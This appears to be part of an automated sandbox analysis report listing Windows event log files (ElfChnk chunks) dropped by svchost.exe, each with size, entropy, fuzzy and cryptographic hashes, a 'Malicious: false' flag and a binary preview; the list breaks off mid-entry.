                                              Preview:ElfChnk.........H...............H...........Xy...z..........................................................................C...................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................=........`......................................................................**...............v?..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):2.0681491427983456
                                              Encrypted:false
                                              SSDEEP:384:UYhMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3G:9mw9g3Lcf
                                              MD5:25CCA867EAB2774426FED5C3D04A2EF4
                                              SHA1:6067781D454A6EDF9E98A78132B69F436AC16337
                                              SHA-256:44D697FC3B28B68CE43669A173E29F2ADC987FD88481E65A924C8E194CD853F0
                                              SHA-512:3CE99ECDE9CF15113BD27441F6FC6CA41C428AE3BF327E500B99A5F2EDEA73DF85284BE9535B0CB9936B4BF35D48B82822B102DB4871F2C2E3A97E6E1EC95D19
                                              Malicious:false
                                              Preview:ElfChnk.........3...............3............i..Xk..a.........................................................................Y.................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......E.......................n.......#........X......................................................................**..............j...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):1.8987523722619128
                                              Encrypted:false
                                              SSDEEP:384:QohCI2q16fIwIaIgucw7VIh3IAIHyIAIJIEIzITI5IYIMI+2Ia:QoWt67QzY
                                              MD5:A8DF72B289CBC51F9CD71706EB9C8074
                                              SHA1:9EBE0554C13EDF570F7A8CAD77E0D54B6064B024
                                              SHA-256:928FEF11A8961DB802D45388B8191C37BB6A3324C6B4CB6143E86DFAE8CAB9FB
                                              SHA-512:21000A9F3E92D89092650B9228BF60989ED5AF52F2F8EAC06E04EF1BA6F86B530E2DCF3091EC7A58A5FC523D7948930347F5E5C52D885103AC5256511D5EA2EC
                                              Malicious:false
                                              Preview:ElfChnk.8.......H.......8.......H...............H...?p......................................................................>...................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................................................5)......................................................................................**......8........lO>y.............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):1.029512281542089
                                              Encrypted:false
                                              SSDEEP:384:Sh1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhM5vMMKMVaMpb9:SeJ+
                                              MD5:C27B7F0F7B0FB25DF8611EA44A294878
                                              SHA1:A39349908835FA25EFA5A44B4F37331BAE1FBFD8
                                              SHA-256:C5FE3C69BD247DF517F7FF1E6E07C6ACC411DF9DBA60E4EC6BC32A841D990490
                                              SHA-512:8FD8E689C630B7E62BF2953E4C6BE30EF3366A0D2B627DFC167079EE01321E051816DD3EC335D231633CD12912CD39CCE7572CA4F69D2EEC9C1D7D9D38210BDD
                                              Malicious:false
                                              Preview:ElfChnk.....................................0-......e..;................................................................................................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................................6(......................................................................**..............c...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):4.0958062741245485
                                              Encrypted:false
                                              SSDEEP:384:phk1EL1I1Vh1C1D161f1f181L1tY1VGm1Q1L1p1VG1U1Z1s1VA141c1Vc1q1tS1Q:pBjdjP0csYEt
                                              MD5:E5FFA1C93474375EE0EDC9B1D47B08EB
                                              SHA1:40CC41E6F362B52D1B30376DEF2074003E16CB28
                                              SHA-256:4B4202968F37AE509E34046ECDCC19C0FDC5CFD61D501031EC0A7EF4A82E6303
                                              SHA-512:D49594FD894C2A727DFB0650D87A6A725D635FE52CC7A035BB48277052AF87548CCF56D42A2EB94ACDD1F5754294586D19A62047ACB73EDB0779DACC859BCEFE
                                              Malicious:false
                                              Preview:ElfChnk.....................................`.........A.....................................................................x=V3................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................A.......................................................**..............*5.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):77968
                                              Entropy (8bit):3.1764015420210345
                                              Encrypted:false
                                              SSDEEP:384:PZIdJVI2IFIHIUIxIaIQIBLI33IzBIbnIFIvIoIuWI3IbQ9IOdHIAIhInWhDIEQP:POvQLdlWZxGD7DUvQLd
                                              MD5:5CA1DBD18BC9F93C4FD7A1E740277258
                                              SHA1:20B0AA4C2666F5EB47CF6A5E6F2F85DD73A2D1E1
                                              SHA-256:C5597D09DBF9EC89C1D01DE4417553565F31354166590069F26110EA0CC4702E
                                              SHA-512:DFB178DFD8CCCAB2B2FAFD1254531A4E5EA4E9F3735A1E2CC4FA8472B4A0DB95ACD6342FC840F1A2717256B6AD74B22944DD4DDD13108B831F1A6B94F41E42C7
                                              Malicious:false
                                              Preview:ElfChnk.T...............T...........................12........................................................................\.........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................................................ax...............J..1........................................)..........................**......r.........b.............>..J..............................................................,.......D.....!........... ....@..b......#..|....#..|...........r....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.N.t.f.s..z.?..nM.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.N.t.f.s./.O.p.e.r.a.t.i.o.n.a.l.......ax..&.......6p.\.#i....>..........2........A..=...>.../....=.......V.o.l.u.m.e.C.o.r.r.e.l.a.t.i.o.n.I.d.......A..7...>...)....=.......V.o.l.u.m.e.N.a.m.e.L.e.n.g.t.h....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):0.7757677601444701
                                              Encrypted:false
                                              SSDEEP:384:Ih6iIvcImIvITIQIoIoI3IEIMIoIBIbIsDIMI/IElI:IoxfM
                                              MD5:1C5307106CE519AB4E031F987728545E
                                              SHA1:05AF7E5DCB8CB653A42401ACA9FDD4E65DF313D7
                                              SHA-256:6068A83FE75666D6384EF3FE52E750C0C50715BD1CA6C79F4E815E928EAF7749
                                              SHA-512:9B0132164BCE3385C4450745AB21106494668A8196EDA0C7074C98743DF4262800CE75BD84093122314A9D9F15BF69412086B4D43723F7244FBFEA1D42E06158
                                              Malicious:false
                                              Preview:ElfChnk......................................!..X"....Y>......................................................................O............................................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................................^.......................................................................**..............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):2.8926911957757824
                                              Encrypted:false
                                              SSDEEP:768:E4u1n8zfFFU1x4Dk13xIb13xIb13xIt13xIi13xI513xIU13xI013xIF13xIH13r:+
                                              MD5:41C05605A1D8406986AB7E1A38EF5F6A
                                              SHA1:FBABF27EC5005702DB27138A6FFEE44C08C0AF9F
                                              SHA-256:A24B9104262DB2C2DB4CACD2B80878E7F33F344FB3CA4817552F2430FAE02FCB
                                              SHA-512:4CB12276520B25399F9259495DDC3D48B43FB38FC12E5924F0A2ACDDDAD0CC808E96000BE3CE8D783307CEC152D3C881FF623FC6B60E78AB1D3DFBC9D0A7D521
                                              Malicious:false
                                              Preview:ElfChnk.........................................(......N....................................................................0w_.................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................ ......................................................................................**...............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):7128
                                              Entropy (8bit):4.154098052297632
                                              Encrypted:false
                                              SSDEEP:192:HYt+38V77/yAjpcyZpXyLp0yCpYryUpHyFRpCQydpYSyTpoyKt8pUyq5TpYTyl6e:o7hzy3yzy2yFyAyF2QypymyufytyldyS
                                              MD5:77CDC8D79A9054B804347E7B7B9C22F5
                                              SHA1:C97A837005A8F9EE800B672EC2C5F8FB4EB1B56B
                                              SHA-256:2666F6BD45FD873B32D44575C76277A3D52C914ABD5B699903DF269E4B524573
                                              SHA-512:0D56801A2D89B57BDFA4F151574BF14B575F042E1CE98A4E5600549C5202223B10D051BF31F0F38EA2C0AE2A1B06AE4C04C5BE112785F9E5D35A6E8DBE31C619
                                              Malicious:false
                                              Preview:ElfChnk.................O.......W...............@....c......................................................................._..................0...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................................&.......................................................................**..`...O.......:..............>.&.........>.]v0].............A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):4.431161619621183
                                              Encrypted:false
                                              SSDEEP:768:TaTzn2C8PNMKfN1JlYnY91yHqvTLGx/p9e:KznUNMKF1JlYn2EKvT+pc
                                              MD5:AD71949D7766CE333A6B47030D3636B3
                                              SHA1:8BF1B493CEF6898A9DF12197BF36892C9FF37013
                                              SHA-256:188CC4E3CE00C52F6F33CC911DC881F612F1257C28A7BCA6B19CBE1051C59ABC
                                              SHA-512:E74449F0A683FDC216958A05DFF0D664E6504C786611254CAF59E4D4C779AA8F5ADFF939A4544BD0777D91D929C3AD6AF13EF2D2B750969475C2BA461366F361
                                              Malicious:false
                                              Preview:ElfChnk.........J...............J...........`.......s)Z.....................................................................,..%................n...........................=...........................................................................................................................f...............?...........................m...................M...F................................................................y..........&...............G....................................&..................**...............B..|...........>.&.........>.]v0].............A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):0.7292526058307754
                                              Encrypted:false
                                              SSDEEP:384:ehP8o8Z85848V8M8g8D8R8E8z8gh8r8U8:el
                                              MD5:66DDAF28DEF9C7EF4C1C5AF13E903BEF
                                              SHA1:16ADC17E9E501EC1FC66C217B0A95938B5B26D99
                                              SHA-256:FF21B59E89C1D2ABD6D42A42337FF6EA79D48B4BAF1EB8E74F337C62F3F2B59D
                                              SHA-512:350985C41F91B7B31649829636C3FB98F563132353B8E8812807C810AC9F3EA3787C9ECE5103217769B32CA0E0BD71FE724D16DE3DE9FEA80105E47A6E5D1956
                                              Malicious:false
                                              Preview:ElfChnk.....................................@.......J.{.....................................................................aG.........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............v.......................................................................**..(.............................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):3.759510303432342
                                              Encrypted:false
                                              SSDEEP:1536:nXhxUyS+z1VV18o838c8bUc8cVVsz8VX8SoX8aA8cmtpjAiVB18dwE4vjcYoMjn1:nXznS
                                              MD5:3611D65103293C998063DA829CC23366
                                              SHA1:59E4A7222413F5B753D6382609623D0AD479C0BC
                                              SHA-256:E582C2B47E58387FD15A0E8B596FCB115B6FA80ED4F76D1AF969DC634CAE4526
                                              SHA-512:0EA7376DA8612958BE75C148C163513D6DCC689BB4E11C864D8BD71E307C3B2F4B5CA957BE4E895E6FD8A80FE16E63FB6DFE803303BBA89C7ECC26E90819B1BD
                                              Malicious:false
                                              Preview:ElfChnk.........&...............&...........`G...I..........................................................................On..................v...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&................=..............................................O.......................**..............g5...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):2.326600334124648
                                              Encrypted:false
                                              SSDEEP:768:/0VsLY/Z5aFka2aKazzabCafama5Sa0ra6rzaJcavkao9OSaEbQvUcP9cM1cW:dcEm
                                              MD5:23E0BBADE75A049E789D9EF4428B6D16
                                              SHA1:2BBDA8A9ACEAC9604CD192CB83F0DFD0C274B828
                                              SHA-256:8F66DD1ABAEDEE283B60251E5E5CE69AFD7FC632CB3DA202AED0C4A7AE8D5738
                                              SHA-512:C2F47557EB37E90B2A93EA6C8F8889DE92B8C3D14BA7BB9FB103B3DC3B5A32134E567E6103349F48B246D776F58F89D983CDA80CE169D25E93C1B0DA2E8552F6
                                              Malicious:false
                                              Preview:ElfChnk.........;...............;............r...u....&......................................................................I..................Q...........................=...........................................................a...............................................................f...............?...2...........................................M...F...........................*...........&...........................................................%_...........b..............]...................**.............._.............X..&.......X...],T.'tB..E........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):83384
                                              Entropy (8bit):2.0343170148683227
                                              Encrypted:false
                                              SSDEEP:384:9hdi60lLNj5VUFQpN5N3iP5yY09GiP5pPdOiP5pq0iP5p0sViP5yYRiP5pTiP5pf:9KvfKvB2
                                              MD5:C3278A7D4C2CBAC2428F99BBD6630023
                                              SHA1:BFAA5411B811FF570E344AAE9082CEAE78D4D62E
                                              SHA-256:393D5EAF6920343DE1CCEDCD297824C94F87E3D6C915A99B8ABEE24BDE6C92BA
                                              SHA-512:A7D9FD16052805CE22C4A0D6745B24A5D6BD7A9966D6EBDE875F89F9D2EE8821E16644DF90E94B7DF3735414108E7665B313502D112817FF018A5771845FAF5E
                                              Malicious:false
                                              Preview:ElfChnk.'...............'....................9..@@....k.........................................................................................d...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................=...............&...............>.......................................................................**......'.........q.z.............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):4.330812980192055
                                              Encrypted:false
                                              SSDEEP:384:Nlm/hDGCyCkCzCRCFCjOCjCmCLsCFCuCsC1CvCH2ga2g2E82A202sh2nCgCDCoPx:Nlm/dV95W+rdl00xY
                                              MD5:F5E348F85D07D86C32479D397F8EF4A9
                                              SHA1:14FCCD4003A8C9B0D78D0F18B6289B96365F8FBD
                                              SHA-256:376F962B9DDEA52BCD2996D7CB198EBCBB50232E318450ABD3A284650BE1DBF9
                                              SHA-512:A4B0AC9BB2335DA327DFDFCC64D61C2DEE02EE42622610B592DC28B1DB5F4E950D956040F0E4792028FB22F3FAE1DA1DF551FBFDCBB3F66F491295C343778DF1
                                              Malicious:false
                                              Preview:ElfChnk.U...............U...........................L....................................................................J...................F.......................n...=...........................................................................................................................f...............?...........................m...................M...F............................4..............................&................d..............................Yd...............^......................**..0...U.........Df..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):4.487219530769755
                                              Encrypted:false
                                              SSDEEP:1536:yv3NvmwAwEGhqx00NfSVKoMzbJQBG6Jw+up2cXRITYH5lhTTh1m67KzbHCFiaBhX:yv3NvmwAwEGhqx00NfSVKoMzlQBG6Jw1
                                              MD5:D59E48DA62C61308E6541D9E92AC1F1C
                                              SHA1:C161B63BC2C2A32CE1935335BF55DDA270932255
                                              SHA-256:31B592408094085892003D4969F1BF5CE72E4D758C30489B9864674BDB81EA6E
                                              SHA-512:3B4D1648DE93007F4322660A4BC0DF7F2D73C3B3E6F24F126D89D1FF925D3CCDC19A92B988FB9AF6436DE5A267E3DF0D78CBBAF31A4A8A300393A823A8CE1BA4
                                              Malicious:false
                                              Preview:ElfChnk.....................................H[...]....+n....................................................................!0.Z................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&................K......................................................................**..............9...z.............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):69680
                                              Entropy (8bit):4.465997684688716
                                              Encrypted:false
                                              SSDEEP:1536:fI4hNZB+vczCQ0+K5yJe54qdmSRu7Srxwyqy7O0n5yTOoIYhXxbwLJ/qHTeZBS/I:fI4h7B+vczCQ0+K5yJe54qdmSM7Srxwi
                                              MD5:C654F241F738B4E935040CD9FB2D1C85
                                              SHA1:F40516930F94550D4036EB5EF7C91AC797E3696D
                                              SHA-256:94399231A0F079CE5BFFE14C5FE4BA98147C1DCDDBC66B5F0E34D445C8949D6D
                                              SHA-512:CC73B75CFDAA3D9AA9152A035C2CBCC34197F67F102001E1D16E2BB7C998C8DC0793CC22DAEB0358DB95383C2773A0FDECB8E6E89F29A95058A80C3BBABE194E
                                              Malicious:false
                                              Preview:ElfChnk.....................................@...............................................................................|..A................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................&...................i~......Ah...............f...a..............Ij......**..x............L.............>.&...............................................................8.......P.....!....nqm......... .L.....Q:w....J.qt..5?] ...d............................$.N......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.h.e.l.l.-.C.o.r.e..n30'.|D..Q.R.a.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.h.e.l.l.-.C.o.r.e./.O.p.e.r.a.t.i.o.n.a.l......L.a........t.-.Wx...**..(.............N.............>.&...............................................................8.......P.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):2.2666167169548475
                                              Encrypted:false
                                              SSDEEP:384:yIh47R7u7aI7G7z7I7Q7q7V7l7x7W777a7T7C7E7A767m7c7D7Z707t7Pw7S7r7J:BU3dzV
                                              MD5:22D6CAF89D6E971BD7540D97009B5389
                                              SHA1:334700482A6DA16F1773192114015CE9E51098B9
                                              SHA-256:BA6278F8B009C2A4DA2B614AE03224F0E7AE9FA015B00627A86295558DDCFA2B
                                              SHA-512:B7337B44CFE646712683E576D1762DECD24658B946BE9724D715863A06AF84AA32201F16AA9B58653F22FBFE70FCDB45D9E06102C47530B4B04E4050B1175597
                                              Malicious:false
                                              Preview:ElfChnk......................................j..Pl..:6.......................................................................,.(............................................=...........................................................................................................................f...............?...........................m...................M...F...........................}/...............(..s...........&................G..............................................}-......................**.................E{.............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):2.236143580344532
                                              Encrypted:false
                                              SSDEEP:384:Yhc+uaNuru+uhuKVuPJu5u9u4ufuTuxuDuvuDuOuXumui+udutui4uTAuFuauinU:Y6Ovc0S5UyEeDgLJMm1F
                                              MD5:B826C4F1E8501C8B44D444E3D22421FA
                                              SHA1:1E05D127E4ADA0929135C44A598CFCEB5B4C3DF3
                                              SHA-256:8CC543159578D9517679465F01876987D03E865B39A1E838A25D1DBDAF7F49D3
                                              SHA-512:B5FBC7C73E82323222BCE3B47DAD9494C8F4F9AF74A2B9C863C6D9E2A6A4E592E5E3D01136C0B8ABB1A4B9D01085801FF6CC13629CEFD80980117D88F3D7F94C
                                              Malicious:false
                                              Preview:ElfChnk.........>...............>............p...q..h.A......................................................................*..................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................................Fa......................................w...............................**...............&3..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):0.7847876256447208
                                              Encrypted:false
                                              SSDEEP:384:KhGuZumutu4uEu5uOuDuyb2uPu1upueJuLuVu:Kw
                                              MD5:E151B97764C77FC371A900F824AF5F14
                                              SHA1:B56AD00FD836B0393E59652FFDF770652A8A1CC0
                                              SHA-256:B5727AE567E8F991FAE194219B0F985E5B7451DC89FC4B58314542615C9C7968
                                              SHA-512:B4AE0A611A979CF0BE114EEFD5B0A57EDA6064E9E87F6D2EBD6E43647BF03DBF6191B099B3B7BFAC93046ADF3116345B18A55F85560D66CEA8B37BC10B783556
                                              Malicious:false
                                              Preview:ElfChnk.....................................H!..."....&.........................................................................................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............>.......................................................................**..............Wy.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):4.327837410933181
                                              Encrypted:false
                                              SSDEEP:384:HhmAmAltAlDAlAAliAlbAlIAlAtAlwAlEAluAlZAlFAl/AlFAlcAlEAl2AlhAlOj:HPPSWUSYvAybXZAFwYhh
                                              MD5:DCD843428C979E3A00FC181309C3B722
                                              SHA1:4549EACA2BF219818BD5944E314557B950117600
                                              SHA-256:701A82EFDFC248CB682D84DD80C5DB9C3790FB7A531C567AC068BD9553B75F99
